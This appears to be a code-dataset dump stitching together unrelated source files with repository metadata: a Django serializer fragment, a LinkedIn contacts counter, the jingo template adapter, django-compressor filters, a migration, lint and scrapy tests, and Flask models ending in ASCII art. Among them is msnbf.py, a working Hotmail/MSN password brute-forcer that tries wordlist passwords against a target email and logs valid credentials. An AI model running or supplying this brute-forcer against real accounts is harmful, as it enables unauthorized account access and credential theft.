% (status, ', '.join(available_status)))
mailings_filter['status'] = {'$in': list(map(force_text, status_list))}
if 'owner_guid' in args:
owners = args['owner_guid']
if isinstance(owners, str):
mailings_filter['owner_guid'] = owners
else:
mailings_filter['owner_guid'] = {'$in': owners}
if 'satellite_group' in args:
satellite_groups = args['satellite_group']
if isinstance(satellite_groups, str):
mailings_filter['satellite_group'] = satellite_groups
else:
mailings_filter['satellite_group'] = {'$in': satellite_groups}
return mailings_filter
class RecipientSerializer(Serializer):
"""
Recipient serializer
"""
model_class = models.MailingRecipient
fields = (
'_id', 'email', 'send_status', 'tracking_id',
'reply_code', 'reply_enhanced_code', 'reply_text', 'smtp_log',
'modified',
'first_try', 'next_try', 'try_count',
'in_progress',
'cloud_client',
)
id_field = 'tracking_id'
@property
def filtered_fields(self):
return list(set(self.fields) & (set(self._fields_filter) | {'tracking_id'}))
@defer.inlineCallbacks
def get(self, id):
recipient = yield super(RecipientSerializer, self).get(force_text(id))
recipient.pop('id')
recipient['id'] = recipient.pop('tracking_id')
defer.returnValue(recipient)
def make_filter(self, args):
_args = args.copy()
if 'mailing' in _args:
_args['mailing.$id'] = _args.pop('mailing')
smtp_reply = _args.pop('smtp_reply', None)
_args = super(RecipientSerializer, self).make_filter(_args)
if smtp_reply:
_args.setdefault('$and', []).append({'$or': [
{'reply_code': smtp_reply},
super(RecipientSerializer, self).make_filter({'reply_text': smtp_reply}),
]})
return _args
class SatelliteSerializer(Serializer):
model_class = models.CloudClient
fields = (
'_id', 'serial', 'enabled', 'paired', 'date_paired', 'shared_key', 'domain_affinity', 'group', 'version',
'settings'
)
class HourlyStatsSerializer(Serializer):
model_class = models.MailingHourlyStats
fields = (
'sender', 'date', 'epoch_hour', 'sent', 'failed', 'tries'
)
# def make_filter(self, args):
# _args = args.copy()
# from_date = dateutil.parser.parse(_args.pop('from_date', None))
# to_date = _args.pop('to_date', None)
# _args.setdefault('date', {})['$gte'] = from_date
# if not to_date:
# to_date = from_date + timedelta(hours=999)
# else:
# to_date = dateutil.parser.parse(to_date)
# _args.setdefault('date', {})['$lte'] = to_date
# _args = super(HourlyStatsSerializer, self).make_filter(_args)
# return _args
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_args = spec.copy()
from_date = _args.pop('from_date', None)
if not from_date:
from_date = datetime.now() - timedelta(hours=24)
from_date = dateutil.parser.parse(from_date, ignoretz=True)
to_date = _args.pop('to_date', None)
_args = self.make_filter(_args)
_args.setdefault('date', {})['$gte'] = from_date
if not to_date:
to_date = from_date + timedelta(hours=999)
else:
to_date = dateutil.parser.parse(to_date, ignoretz=True)
_args.setdefault('date', {})['$lte'] = to_date
response = {
'items': compute_hourly_stats(_args, from_date, to_date)
}
return response
| agpl-3.0 | 2,927,350,094,673,577,500 | 36.217532 | 125 | 0.567914 | false |
peterorum/data-hmm | linkedin/by-company.py | 1 | 1337 | #!/usr/bin/python
import os
import csv
from collections import Counter
from operator import itemgetter
from prettytable import PrettyTable
# XXX: Place your "Outlook CSV" formatted file of connections from
# http://www.linkedin.com/people/export-settings at the following
# location: resources/ch03-linkedin/my_connections.csv
CSV_FILE = os.path.join("private", 'linkedin-connections.csv')
# Define a set of transforms that converts the first item
# to the second item. Here, we're simply handling some
# commonly known abbreviations, stripping off common suffixes,
# etc.
transforms = [(', Inc.', ''), (', Inc', ''), (', LLC', ''), (', LLP', ''),
(' LLC', ''), (' Inc.', ''), (' Inc', ''), (' AU', ''), (' Australia', ''),
(' Pty Ltd', ''), (' Ltd', '')]
csvReader = csv.DictReader(open(CSV_FILE), delimiter=',', quotechar='"')
contacts = [row for row in csvReader]
companies = [c['Company'].strip() for c in contacts if c['Company'].strip() != '']
for i, _ in enumerate(companies):
for transform in transforms:
companies[i] = companies[i].replace(*transform)
pt = PrettyTable(field_names=['Company', 'Freq'])
pt.align = 'l'
c = Counter(companies)
[pt.add_row([company, freq])
for (company, freq) in sorted(c.items(), key=itemgetter(1), reverse=True)
if freq > 1]
print pt | mit | -3,733,075,963,262,727,700 | 29.409091 | 91 | 0.646223 | false |
leleobhz/scripts | python/others_utilities/msnbf.py | 1 | 3708 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Hotmail brute forcer
# programmer : gunslinger_
# Inspired by mywisdom
# This program is only for educational purposes only.
import sys, time, msnp
__Author__ = "Gunslinger_ - Modified by Leleobhz"
__Version__ = "1.0"
__Date__ = "Mon, 22 Feb 2010 13:13:43 +0700 "
log = "msnbrute.log"
file = open(log, "a")
counter = 0
face = '''
MSN brute forcer
programmer : %s
version : %s
date release : %s
''' % (__Author__, __Version__, __Date__)
help = '''
Usage : ./msnbf.py -u [email] -w [wordlist]
Example : ./msnbf.py -u [email protected] -w wordlist.txt
'''
for arg in sys.argv:
if arg.lower() == '-u' or arg.lower() == '--user':
email = sys.argv[int(sys.argv.index(arg))+1]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
print face
print help
file.write(face)
file.write(help)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
def definer():
print "-" * 60
print "[+] Email : %s" % email
print "[+] Wordlist : %s" % wordlist
print "[+] Length wordlist : %s " % len(words)
print "[+] Time Starting : %s" % time.strftime("%X")
print "-" * 60
file.write ("\n[+] Email : %s" % email)
file.write ("\n[+] Wordlist : %s" % wordlist)
file.write ("\n[+] length wordlist : %s " % len(words))
file.write ("\n[+] Time Starting : %s" % time.strftime("%X"))
class msnnologin(Exception):
def __init__(self, output):
self.output = output
def __str__(self):
return repr(self.output)
def msnparse():
def state_changed(self, state):
if state == "New state: NLN":
return 0
else:
raise msnnologin(state)
def main(password):
global counter
sys.stdout.write ("[-] Trying : %s \n" % (password))
sys.stdout.flush()
file.write("[-] Trying : %s \n" % (str(password)))
try:
msntmp = msnp.Session(msnparse())
msntmp.login(email, password)
print "[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password)
file.write("[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password))
sys.exit(1)
except msnp.error.HttpError:
exit
except msnnologin:
exit
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
counter+=1
if counter == len(words)/5:
print "[+] Hotmailbruteforcer 20% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/4:
print "[+] Hotmailbruteforcer 25% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/2:
print "[+] Hotmailbruteforcer on 50% done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on halfway done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words):
print "[+] Hotmailbruteforcer done...\n"
file.write("[+] Hotmailbruteforcer done...!\n")
msntmp.logout()
if __name__ == '__main__':
print face
file.write(face)
definer()
for password in words:
main(password.replace("\n",""))
main(password)
| gpl-2.0 | -3,270,820,469,121,388,000 | 29.393443 | 118 | 0.591963 | false |
mliu7/jingo | jingo/__init__.py | 1 | 8300 | """Adapter for using Jinja2 with Django."""
import functools
import imp
import logging
import re
from django.conf import settings
from django.template.base import Origin, TemplateDoesNotExist
from django.template.context import get_standard_processors
from django.template.loader import BaseLoader
from django.utils.importlib import import_module
import jinja2
VERSION = (0, 6, 1)
__version__ = '.'.join(map(str, VERSION))
EXCLUDE_APPS = (
'admin',
'admindocs',
'registration',
'context_processors',
)
log = logging.getLogger('jingo')
_helpers_loaded = False
class Environment(jinja2.Environment):
def get_template(self, name, parent=None, globals=None):
"""Make sure our helpers get loaded before any templates."""
load_helpers()
return super(Environment, self).get_template(name, parent, globals)
def from_string(self, source, globals=None, template_class=None):
load_helpers()
return super(Environment, self).from_string(source, globals,
template_class)
def get_env():
"""Configure and return a jinja2 Environment."""
# Mimic Django's setup by loading templates from directories in
# TEMPLATE_DIRS and packages in INSTALLED_APPS.
x = ((jinja2.FileSystemLoader, settings.TEMPLATE_DIRS),
(jinja2.PackageLoader, settings.INSTALLED_APPS))
loaders = [loader(p) for loader, places in x for p in places]
opts = {'trim_blocks': True,
'extensions': ['jinja2.ext.i18n'],
'autoescape': True,
'auto_reload': settings.DEBUG,
'loader': jinja2.ChoiceLoader(loaders),
}
if hasattr(settings, 'JINJA_CONFIG'):
if hasattr(settings.JINJA_CONFIG, '__call__'):
config = settings.JINJA_CONFIG()
else:
config = settings.JINJA_CONFIG
opts.update(config)
e = Environment(**opts)
# Install null translations since gettext isn't always loaded up during
# testing.
if ('jinja2.ext.i18n' in e.extensions or
'jinja2.ext.InternationalizationExtension' in e.extensions):
e.install_null_translations()
return e
def render_to_string(request, template, context=None):
"""
Render a template into a string.
"""
def get_context():
c = {} if context is None else context.copy()
for processor in get_standard_processors():
c.update(processor(request))
return c
# If it's not a Template, it must be a path to be loaded.
if not isinstance(template, jinja2.environment.Template):
template = env.get_template(template)
return template.render(get_context())
def load_helpers():
"""Try to import ``helpers.py`` from each app in INSTALLED_APPS."""
# We want to wait as long as possible to load helpers so there aren't any
# weird circular imports with jingo.
global _helpers_loaded
if _helpers_loaded:
return
_helpers_loaded = True
from jingo import helpers # noqa
for app in settings.INSTALLED_APPS:
try:
app_path = import_module(app).__path__
except AttributeError:
continue
try:
imp.find_module('helpers', app_path)
except ImportError:
continue
import_module('%s.helpers' % app)
class Register(object):
"""Decorators to add filters and functions to the template Environment."""
def __init__(self, env):
self.env = env
def filter(self, f=None, override=True):
"""Adds the decorated function to Jinja's filter library."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
return f(*args, **kw)
return self.filter(wrapper, override)
if not f:
return decorator
if override or f.__name__ not in self.env.filters:
self.env.filters[f.__name__] = f
return f
def function(self, f=None, override=True):
"""Adds the decorated function to Jinja's global namespace."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
return f(*args, **kw)
return self.function(wrapper, override)
if not f:
return decorator
if override or f.__name__ not in self.env.globals:
self.env.globals[f.__name__] = f
return f
def inclusion_tag(self, template):
"""Adds a function to Jinja, but like Django's @inclusion_tag."""
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kw):
context = f(*args, **kw)
t = env.get_template(template).render(context)
return jinja2.Markup(t)
return self.function(wrapper)
return decorator
env = get_env()
register = Register(env)
class Template(jinja2.Template):
def render(self, context={}):
"""Render's a template, context can be a Django Context or a
dictionary.
"""
# flatten the Django Context into a single dictionary.
context_dict = {}
if hasattr(context, 'dicts'):
for d in context.dicts:
context_dict.update(d)
else:
context_dict = context
# Django Debug Toolbar needs a RequestContext-like object in order
# to inspect context.
class FakeRequestContext:
dicts = [context]
context = FakeRequestContext()
# Used by debug_toolbar.
if settings.TEMPLATE_DEBUG:
from django.test import signals
self.origin = Origin(self.filename)
signals.template_rendered.send(sender=self, template=self,
context=context)
return super(Template, self).render(context_dict)
class Loader(BaseLoader):
is_usable = True
env.template_class = Template
def __init__(self):
super(Loader, self).__init__()
include_pattern = getattr(settings, 'JINGO_INCLUDE_PATTERN', None)
if include_pattern:
self.include_re = re.compile(include_pattern)
else:
self.include_re = None
def _valid_template(self, template_name):
if self.include_re:
if not self.include_re.search(template_name):
return False
if hasattr(template_name, 'split'):
app = template_name.split('/')[0]
if app in getattr(settings, 'JINGO_EXCLUDE_APPS', EXCLUDE_APPS):
return False
return True
def get_template_sources(self, template_name, template_dirs=None):
"""
Returns the absolute paths to "template_name", when appended to each
directory in "template_dirs". Any paths that don't lie inside one of the
template dirs are excluded from the result set, for security reasons.
"""
if not template_dirs:
template_dirs = []
for template_dir in template_dirs:
try:
yield safe_join(template_dir, template_name)
except UnicodeDecodeError:
# The template dir name was a bytestring that wasn't valid UTF-8.
raise
except ValueError:
# The joined path was located outside of template_dir.
pass
def load_template(self, template_name, template_dirs=None):
if not self._valid_template(template_name):
raise TemplateDoesNotExist(template_name)
try:
template = env.get_template(template_name)
return template, template.filename
except jinja2.TemplateNotFound:
raise TemplateDoesNotExist(template_name)
def load_template_source(self, template_name, template_dirs=None):
if not self._valid_template(template_name):
raise TemplateDoesNotExist(template_name)
try:
template = env.get_template(template_name)
except jinja2.TemplateNotFound:
raise TemplateDoesNotExist(template_name)
with open(template.filename, 'rb') as fp:
return (fp.read().decode(settings.FILE_CHARSET), template.filename)
| bsd-3-clause | 9,181,463,428,604,043,000 | 31.29572 | 81 | 0.604699 | false |
kottenator/django-compressor-toolkit | compressor_toolkit/filters.py | 1 | 3854 | import logging
import os
import re
from compressor.filters.css_default import CssAbsoluteFilter
from compressor.filters.datauri import CssDataUriFilter as BaseCssDataUriFilter
from django.apps import apps
from django.conf import settings
app_config = apps.get_app_config('compressor_toolkit')
logger = logging.getLogger(__file__)
class CssRelativeFilter(CssAbsoluteFilter):
"""
Do similar to ``CssAbsoluteFilter`` URL processing
but replace ``settings.COMPRESS_URL`` prefix with '../' * (N + 1),
where N is the *depth* of ``settings.COMPRESS_OUTPUT_DIR`` folder.
E.g. by default ``settings.COMPRESS_OUTPUT_DIR == 'CACHE'``,
its depth N == 1, prefix == '../' * (1 + 1) == '../../'.
If ``settings.COMPRESS_OUTPUT_DIR == 'my/compiled/data'``,
its depth N == 3, prefix == '../' * (3 + 1) == '../../../../'.
How does it work:
- original file URL: '/static/my-app/style.css'
- it has an image link: ``url(images/logo.svg)``
- compiled file URL: '/static/CACHE/css/abcdef123456.css'
- replaced image link URL: ``url(../../my-app/images/logo.svg)``
"""
def add_suffix(self, url):
url = super(CssRelativeFilter, self).add_suffix(url)
old_prefix = self.url
if self.has_scheme:
old_prefix = '{}{}'.format(self.protocol, old_prefix)
# One level up from 'css' / 'js' folder
new_prefix = '..'
# N levels up from ``settings.COMPRESS_OUTPUT_DIR``
new_prefix += '/..' * len(list(filter(
None, os.path.normpath(settings.COMPRESS_OUTPUT_DIR).split(os.sep)
)))
return re.sub('^{}'.format(old_prefix), new_prefix, url)
class CssDataUriFilter(BaseCssDataUriFilter):
"""
Override default ``compressor.filters.datauri.CssDataUriFilter``:
- fix https://github.com/django-compressor/django-compressor/issues/776
- introduce new settings - ``COMPRESS_DATA_URI_INCLUDE_PATHS`` and
``COMPRESS_DATA_URI_EXCLUDE_PATHS`` - to filter only specific file paths or extensions,
e.g. ``settings.COMPRESS_DATA_URI_INCLUDE_PATHS = '\.svg$'``.
"""
def input(self, filename=None, **kwargs):
if not filename:
return self.content
# Store filename - we'll use it to build file paths
self.filename = filename
output = self.content
for url_pattern in self.url_patterns:
output = url_pattern.sub(self.data_uri_converter, output)
return output
def data_uri_converter(self, matchobj):
url = matchobj.group(1).strip(' \'"')
# Don't process URLs that start with: 'data:', 'http://', 'https://' and '/'.
# We're interested only in relative URLs like 'images/icon.png' or '../images/icon.svg'
if not re.match('^(data:|https?://|/)', url):
file_path = self.get_file_path(url)
# Include specific file paths (optional)
file_path_included = bool(
not hasattr(settings, 'COMPRESS_DATA_URI_INCLUDE_PATHS') or
re.match(settings.COMPRESS_DATA_URI_INCLUDE_PATHS, file_path)
)
# Exclude specific file paths (optional)
file_path_excluded = bool(
hasattr(settings, 'COMPRESS_DATA_URI_EXCLUDE_PATHS') and
re.match(settings.COMPRESS_DATA_URI_EXCLUDE_PATHS, file_path)
)
if file_path_included and not file_path_excluded:
try:
return super(CssDataUriFilter, self).data_uri_converter(matchobj)
except OSError:
logger.warning('"{}" file not found'.format(file_path))
return 'url("{}")'.format(url)
def get_file_path(self, url):
file_path = re.sub('[#?].*$', '', url)
return os.path.abspath(os.path.join(os.path.dirname(self.filename), file_path))
| mit | 1,912,537,893,408,338,700 | 38.731959 | 95 | 0.608978 | false |
adam2392/smile | smile/accounts/migrations/0002_auto_20160313_1723.py | 1 | 1197 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-13 17:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('admins', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='AvailableProject',
),
migrations.AddField(
model_name='userprofile',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='admins.AvailableProject'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| apache-2.0 | -3,652,358,345,451,040,300 | 30.5 | 114 | 0.60401 | false |
redhat-openstack/glance | glance/tests/test_hacking.py | 1 | 2724 | # Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glance.hacking import checks
from glance.tests import utils
class HackingTestCase(utils.BaseTestCase):
def test_assert_true_instance(self):
self.assertEqual(1, len(list(checks.assert_true_instance(
"self.assertTrue(isinstance(e, "
"exception.BuildAbortException))"))))
self.assertEqual(
0, len(list(checks.assert_true_instance("self.assertTrue()"))))
def test_assert_equal_type(self):
self.assertEqual(1, len(list(checks.assert_equal_type(
"self.assertEqual(type(als['QuicAssist']), list)"))))
self.assertEqual(
0, len(list(checks.assert_equal_type("self.assertTrue()"))))
def test_assert_equal_none(self):
self.assertEqual(1, len(list(checks.assert_equal_none(
"self.assertEqual(A, None)"))))
self.assertEqual(1, len(list(checks.assert_equal_none(
"self.assertEqual(None, A)"))))
self.assertEqual(
0, len(list(checks.assert_equal_none("self.assertIsNone()"))))
def test_no_translate_debug_logs(self):
self.assertEqual(1, len(list(checks.no_translate_debug_logs(
"LOG.debug(_('foo'))", "glance/store/foo.py"))))
self.assertEqual(0, len(list(checks.no_translate_debug_logs(
"LOG.debug('foo')", "glance/store/foo.py"))))
self.assertEqual(0, len(list(checks.no_translate_debug_logs(
"LOG.info(_('foo'))", "glance/store/foo.py"))))
def test_no_direct_use_of_unicode_function(self):
self.assertEqual(1, len(list(checks.no_direct_use_of_unicode_function(
"unicode('the party dont start til the unicode walks in')"))))
self.assertEqual(1, len(list(checks.no_direct_use_of_unicode_function(
"""unicode('something '
'something else"""))))
self.assertEqual(0, len(list(checks.no_direct_use_of_unicode_function(
"six.text_type('party over')"))))
self.assertEqual(0, len(list(checks.no_direct_use_of_unicode_function(
"not_actually_unicode('something completely different')"))))
| apache-2.0 | -1,746,852,187,166,258,200 | 41.5625 | 78 | 0.646109 | false |
eLRuLL/scrapy | tests/test_cmdline/__init__.py | 1 | 2487 | import json
import os
import pstats
import shutil
import sys
import tempfile
import unittest
from io import StringIO
from subprocess import Popen, PIPE
from scrapy.utils.test import get_testenv
class CmdlineTest(unittest.TestCase):
def setUp(self):
self.env = get_testenv()
self.env['SCRAPY_SETTINGS_MODULE'] = 'tests.test_cmdline.settings'
def _execute(self, *new_args, **kwargs):
encoding = getattr(sys.stdout, 'encoding') or 'utf-8'
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
proc = Popen(args, stdout=PIPE, stderr=PIPE, env=self.env, **kwargs)
comm = proc.communicate()[0].strip()
return comm.decode(encoding)
def test_default_settings(self):
self.assertEqual(self._execute('settings', '--get', 'TEST1'), 'default')
def test_override_settings_using_set_arg(self):
self.assertEqual(self._execute('settings', '--get', 'TEST1', '-s',
'TEST1=override'), 'override')
def test_override_settings_using_envvar(self):
self.env['SCRAPY_TEST1'] = 'override'
self.assertEqual(self._execute('settings', '--get', 'TEST1'), 'override')
def test_profiling(self):
path = tempfile.mkdtemp()
filename = os.path.join(path, 'res.prof')
try:
self._execute('version', '--profile', filename)
self.assertTrue(os.path.exists(filename))
out = StringIO()
stats = pstats.Stats(filename, stream=out)
stats.print_stats()
out.seek(0)
stats = out.read()
self.assertIn(os.path.join('scrapy', 'commands', 'version.py'),
stats)
self.assertIn('tottime', stats)
finally:
shutil.rmtree(path)
def test_override_dict_settings(self):
EXT_PATH = "tests.test_cmdline.extensions.DummyExtension"
EXTENSIONS = {EXT_PATH: 200}
settingsstr = self._execute('settings', '--get', 'EXTENSIONS', '-s',
'EXTENSIONS=' + json.dumps(EXTENSIONS))
# XXX: There's gotta be a smarter way to do this...
self.assertNotIn("...", settingsstr)
for char in ("'", "<", ">", 'u"'):
settingsstr = settingsstr.replace(char, '"')
settingsdict = json.loads(settingsstr)
self.assertCountEqual(settingsdict.keys(), EXTENSIONS.keys())
self.assertEqual(200, settingsdict[EXT_PATH])
| bsd-3-clause | 4,136,940,395,105,546,000 | 36.681818 | 81 | 0.593084 | false |
dimitdim/GetARoom | Main/app/models.py | 1 | 13192 | __author__ = 'kflores'
"""
Model that defines the class structure of the database.
"""
from app import db
ROLE_USER = 0
ROLE_ADMIN = 1
class Node(db.Model):
"""class representation of one networked sensor kit hooked into ethernet. Instatiation requires the name, ip address, and location of the "node", but all of these values should be placed into the config file (see get_node_config(filename) in download_data.py)
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
ip = db.Column(db.String)
loc = db.Column(db.String, index=True, unique=True)
data = db.relationship('Data', backref='origin', lazy='dynamic')
status = db.relationship('Status', backref='origin', lazy='dynamic')
def __init__(self, name, ip, loc):
self.name = name
self.ip = ip
self.loc = loc
def __repr__(self):
return '%s is at %s in %s' % (self.name, self.ip, self.loc)
class Data(db.Model):
"""
Class representation of one data row in the datatable. This object records the local time, node uptime, brightness, temperature, door IR sensor, and the time the door was last opened. Volume is a dummy variable for feature that is not yet implemented. node_id ties the Data objects to the node object that created them (the location they are at)
"""
id = db.Column(db.Integer, primary_key=True)
localtimestamp = db.Column(db.Integer)
uptime = db.Column(db.Integer)
brightness = db.Column(db.Integer)
temperature = db.Column(db.Integer)
volume = db.Column(db.Integer)
door = db.Column(db.Integer)
last_opened = db.Column(db.Integer)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, localtimestamp, uptime, brightness, temperature, volume, door, last_opened, origin):
self.localtimestamp = localtimestamp
self.uptime = uptime
self.brightness = brightness
self.temperature = temperature
self.volume = volume
self.door = door
self.last_opened = last_opened
self.origin = origin
def __repr__(self):
return "Light: %s, Temp: %s, Last: %s" % (self.brightness, self.temperature, self.last_opened)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
role = db.Column(db.SmallInteger, default=ROLE_USER)
temp = db.Column(db.String(4), default='f')
posts = db.relationship('Post', backref='author', lazy='dynamic')
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id)
def __repr__(self):
return '<User %r>' % (self.nickname)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post %r>' % (self.body)
class Status(db.Model):
"""
Object for storing room status values. An analysis routine that processes sensor data and reaches a conclusion on room state will instatiate these objects. WIP.
"""
id = db.Column(db.Integer, primary_key=True)
start = db.Column(db.Integer)
status = db.Column(db.Boolean)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, start, status, origin):
self.start = start
self.status = status
self.origin = origin
#=======================ittVBBBMMMWMMMMMMMMMMWWWWWWWWWWMMWWMMBRRRXYIi=================================================
#=======================iIXBRBMMMMWWWWWWMMMMMMWWWWMMMMMMMWWWWWMMMWRYt+================================================
#======================+YRBBMMMMMWWWWWWMMMMMMMMWWWWWWMMMWWWWWWMMMWWBVt================================================
#=====================+tRMBMMWWMWWWWWMMMMMMMMMMMWWWWWWWWWWWWWWWWMWMMBY================================================
#====================+tIRMWMWWWWMWWWWMMMMMMMMMMMWWWWWWWWWWMMWMWWMWWWMR================================================
#===================iYtVBWMMWWMWWWWWMMMMMMMMMMMMWWWWWWWWWWWMMMWWWWWWWMV+=;============================================
#==================+VXRBMWMMMMWWMMWWWWWMMMMMMMWMWWWWWWWWWWWWWWWWWWWWWBXY+=;===========================================
#=================;iXXMMMMWMWWWMBMMMWWMMWMMMMMMMMMWWWWWWWWWWWWWWWWWWWMVVi=;===========================================
#==================YBMBMWWWMWWMMMMMBMMMMBMBMMMMMMMMMWMMMMWWWWWWWMWWWWWMVi;=;==========================================
#=================tBMBMMWWMMMBMMWWWWMBMMMBBMMMMMMWMMMBBMMMWWWWWWWWWWWWWBY=;===========================================
#================+RMBBMMWWMWMBMWWWWWWWBBBRBMMMMMMWWMMBBBBMWWWWWWWWWWWWWWXi============================================
#================tMMMMMMWMWWMMWWWMMMWWMBRRRBXBMMWMMMMBBRRRBMWWWWWWWWWWWWBI+=;=========================================
#================IMMWMWMMWWWWWWWMBMMMWWMRXXXVRBBMBBMMBRXVVVRBWW#WWWMWWWWMRt==;;=======================================
#================VMMWMWWWWWWWWMMMMMMMBMBRVVVXRXBRBBBRRXVYYYVRBWWWWWWWWWWMMXY+;========================================
#===============tRMWWWWWWWWWWWWMMMMBRRRRXVYVVVVXXRRXVVYYIYYYVRMMWWWWWWWWWWBV==========================================
#===============YMMWWWWWWWWWWMMBBBBBBRXXVVVVYYVYXRXVYIIIIIYVVXRMWWWWWWWWWMBY==========================================
#============;=+XMMWWWWW##WWMRRRRRRRRXXVYYYYYYVVXXYIIIIIIYYVVVXBWWWWWWWWWWMI;;========================================
#============;IXBWMWWWWW#WWWBXVVVVVVYYYYIIttIYVVYIIIIIIIIYYVVVXBMWWWWWWWWWMY=;========================================
#============+XMMWWWWWWWWWWMRXVVYYYIIIItIIiitIIttttItIIIIYYVVVXRMMWWWWWWWMMY==========================================
#============tVMWWWWWWWWWWMBRXVYYYIIItttttiittiiittttIIIYYYYVVXRMMWWWWWWWMBI==;=======================================
#============iXWWWWW#WMW#WMRRXVYYYIIttttttiiiiiitiittIIIYYYYYVVRMWWWWWWWWMVt==========================================
#=============VWWWWWWWW##WMRXXVVYYIIttiiiii+iiitiittIIIIIIYYYYVXBWWWWWWWWBYi=;========================================
#=============VWWWWWMWW##WMRXXVVYYIIIIti++iiiiiiittttIIIIIIIYYVVXMWWWWWWMBYi;;========================================
#============+IBWMMMMW##WWBRXXVYYYIIIttii+iiiiiitttttttttIVVYYYYYBWWWWWMBBXi;;========================================
#============itXWWWWWWW##WMRXVVVYYYIIttiiiii++iiiiiiiIYVXBBRRXVYYRWWWMBWBRV=;;========================================
#============+IVBWW#WW###WMRXVVYYYIIIttiiiiiiiiiiiitYRBBMBXXXRXYYVMWMBRWWXi=;;========================================
#=============tIXMW#WWWW#WMRXVVYIIIIttiiiiiiiiiiiitYXRXXVYIIIYYYIYBMRXRWWX+;;;========================================
#=============+IYXBWWWWW#WBXVVVYYYYYYYItiiii++++iiIYVVYYItIItIIIIIXMBXRWMV+=;=========================================
#==============tYYRW#WWWWWBVVVVVRRBBBBRXYtii+++++iIYYIYYYIYIIIIIIIVBMXRWRI+=;=========================================
#==============iIYRWWWMWWWRVYVXBMMMMRRXXVtii+++++itIYVXVVXXXYYIIIIYRBXVRYi=;;=========================================
#===============tYXMWMBWWWRYYYRRXVVVVVVVYYti+++++iIYVXVRRYVRRVItIIIXBXYVIi=;;;;=======================================
#===============+IXMWRVMWWRYYYXVIIIIYYVVVYItiiiiitYVXYVMMI+YRYttIIIVBVIIIi=;;=========================================
#================iVMWRYBMWRYYYVYIIYYVVXXXVVYItiitYVVV+YBMViYXYIttIIYRYtIt+=;;=========================================
#=================YBMBIRMWRYYYYYYYXRRRMRYXXXVIiitYYYI+=XXtIVVYIttIIYRVtti;;;;=========================================
#===============++iRMMVVWMRYIYYYYXRRtBBBitVVVYtitYYYYYIttYVVYIttttIYXVtt+;============================================
#================+tVBMRYXBRYIIIYYXRYiRMBi+IVVYtitIYYYYYYVVYYItttttIYVYtti+++++++ii++++++==============================
#================+tIVXMYtRBYYIIIIYXVItVItYVYYYIttIIIIIIIIIIIttittIIYYVIti+iiiiiiiiiiiiii++++==========================
#=================itIYXYtVBYYIttIYVXXXYYVYIIYYItitIIttittttttiiitttIYVItiiiiiiiiiiiiiiiiiiiii+========================
#=================+tIIYYIYRVYIIttIIYVVVYYIttYYItitIIttii++i+iiiittIIYYiiiiiiiiiiiiiiiiiiiiiiii++======================
#==================+ttYIItXXYIItttttIYIItiiIYYItittItttii++++iitttIIVViiiiiittttttttttttttttiiii++====================
#====================tIIttYXYYIttiitttttiittYYItiitIIIIiiiiiiiittIIIVViiitttttttttttttttttttttttii++==================
#=====================iIttYXYYIItiiiiiii+iiIYIIt+itttIYYtiiiiiittIIYVViittttttttttttttttitttttttttii+=================
#=====================+tItIXVYIIttiii+++iitYIIIi++ititYYYIitttttIIYYXYtiiittttttttttttttttttttttttttii+===============
#==================;=;=tIttXVYIIIttii+++iiIYttIi++itttIIYYIIttIIIYYVXYttiittttttttttttttttttttttttttttii+=============
